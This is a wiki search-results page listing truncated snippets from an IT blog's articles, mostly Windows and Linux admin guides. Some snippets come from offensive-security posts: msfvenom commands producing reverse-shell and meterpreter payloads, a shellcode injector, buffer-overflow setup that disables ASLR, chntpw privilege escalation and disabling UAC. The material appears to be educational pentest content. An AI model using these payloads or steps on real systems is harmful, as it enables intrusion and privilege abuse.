Suche
Unten sind die Ergebnisse Ihrer Suche gelistet.
Passende Seitennamen:
Volltextergebnisse:
- Shellcode Injection Part 1 @en:it-security:blog
- sführt.((https://www.ired.team/offensive-security/code-injection-process-injection/process-injection)) I... rmat | | > shell.c | Save to the file shell.c | <code bash> msfvenom -p windows/shell_reverse_tcp LHOST... ta_ga_nai -i 8 -b '\x00\x0d\x0a' -f c > shell.c </code> \\ \\ ===== C++ Injector ===== We create a new ... = 540; int main(int argc, char** argv) { char* code; printf("#nosoc - expecttheunexpected"); co
- Buffer overflow in the 64-bit stack - Part 3 @en:it-security:blog
- ssue a system command when calling the function <code gdb> [-------------------------------------code-------------------------------------] 0x4011de <vuln... >: mov eax,0x0 0x4011f7 <vuln+134>: leave </code> \\ \\ ===== Dependencies ===== * socat mod [[... ps://docs.pwntools.com/en/stable/install.html)) <code bash> python3 -m pip install --upgrade pip python
- Buffer overflow in the 64-bit stack - part 1 @en:it-security:blog
- ileges.((https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/6... s://github.com/longld/peda/blob/master/README)) <code bash> git clone https://github.com/longld/peda.gi... peda echo "source ~/peda/peda.py" >> ~/.gdbinit </code> \\ \\ ==== Deactivate ASLR ==== ASLR must be de... ivated so that memory areas are not randomised. <code bash> echo 0 | sudo tee /proc/sys/kernel/randomiz
- Buffer overflow in the 64-bit stack - Part 2 @en:it-security:blog
- 80568|kompilierte debug binary]] from the blog. <code bash> br *vuln+73 # setze Breakpoint r < i... "/bin/sh") RIP: 0x400469 (<_init+25>: ret) </code> \\ \\ ===== Dependencies ===== What is needed? ... fer_overflow_x64|Part 1]], we also need ropper. <code bash> sudo apt install ropper </code> \\ \\ ===== Deactivate ASLR ===== ASLR must also be deactivated
- Privilege escalation: Windows admin thanks to Linux @en:it-security:blog
- ntpw ==== Now we can install ''chntpw'' using: <code bash> sudo apt install chntpw </code> \\ \\ ==== Find Windows partition ==== We are looking for the Windows partition. <code bash> sudo sfdisk -l </code> {{it-security:blog:screenshot_2024-03-14_145734.png|}} \\ \\ In our examp
- FatCat Attack PoC @en:it-security:blog
- rity pentest}} ====== FatCat Attack PoC ====== <code text> _____ _ ____ _ | ___|_ _| |_ ... | |_ |_| \__,_|\__|\____\__,_|\__| Attack PoC </code> | @orange:This PoC is for demonstration and tra... payload ==== * Start Metasploit * Open cmd <code dos>cmd</code> * Generate payload <code dos>msfvenom -a x86 –platform windows -p windows/meterprete
- Execute repair of Windows 10 @en:windows
- mpt and run the following commands in sequence: <code dos> Dism /Online /Cleanup-Image /CheckHealth Dis... alth Dism /Online /Cleanup-Image /RestoreHealth </code> ===== Repair using PowerShell ===== Open the Powershell and execute the following commands: <code powershell> Repair-WindowsImage -Online -CheckHea... alth Repair-WindowsImage -Online -RestoreHealth </code> ===== Repair using the installation DVD =====
- Disable User Account Control (UAC) completely @en:windows
- /file> ===== Deactivating via PowerShell ===== <code poweershell> New-ItemProperty -Path HKLM:Software... e EnableLUA -PropertyType DWord -Value 0 -Force </code> ===== Attention ===== Changing this entry gran
- Left-align taskbar under Windows 11 @en:windows
- registry values below. ==== Left-aligned ==== <code reg> Windows Registry Editor Version 5.00 [HKEY_... \Explorer\Advanced] "TaskbarAl"=dword:00000000 </code> ==== Centre ==== <code reg> Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced] "TaskbarAl"=dword:00000001 </code>
- Security on the net @en:windows
- eracrypt. Available at [[https://www.veracrypt.fr/code/VeraCrypt/]]. To protect sub-areas in a cloud, yo
- Wallabag installation under Debian @en:linux
- found at this link]]. ===== Installation ===== <code bash> git clone https://github.com/wallabag/wallabag.git cd wallabag && make install </code> ===== Virtual Host ===== ==== Apache 2.4 ==== <code text> <VirtualHost 1.2.3.4:443> ServerName wall... he2/wallabag_access.log combined </VirtualHost> </code> ===== Authorisations ===== <code bash> chown -
- Backing up the sshd @en:linux
- === Firstly, we create a key pair under Linux: <code bash> $ ssh-keygen -t rsa -b 4096 Generating publ... 6:62:09:2d:dc:dd:1e:79:cc:56:d9:2b root@v05-s42 </code> **Be sure to enter a password, otherwise you can... ry, install wipe with //apt-get install wipe//) <code bash>$ wipe id_rsa Okay to WIPE 1 regular file ? ... inks removed but not followed, 0 errors occured.</code> We repeat the process with all users who should
- Postfix Virtual Mailbox Limit @en:linux
- he following error message appears in mail.log: <code text> fatal: main.cf configuration error: virtual... ailbox_limit is smaller than message_size_limit </code> it is a misconfiguration. ===== Troubleshooting ===== In the file <code text> /etc/postfix/main.cf </code> file, the following entry must be added: <code text> virtual_mailb
- Integration of Collabora Office in OwnCloud @en:linux
- oud ====== ===== Installation of Docker ===== <code bash> apt update # Notwendiges Repository hinzuf... t install docker-ce docker-ce-cli containerd.io </code> ===== Starting Docker with Collabora Image ===== <code bash> docker pull collabora/code docker run -t -d -p 127.0.0.1:9980:9980 -e "aliasgroup1=https://cloud.
- n8n installation with Docker Compose @en:linux
- an) ===== ==== 1.1 Uninstall old versions ==== <code bash> sudo apt-get remove docker docker-engine docker.io containerd runc </code> ==== 1.2 Repo installation ==== === 1.2.1 Update apt and activate HTTPS === <code bash> sudo apt-get update sudo apt-get install... tc/apt/sources.list.d/docker.list > /dev/null </code> === 1.2.2 Add Docker GPG Key === <code bash>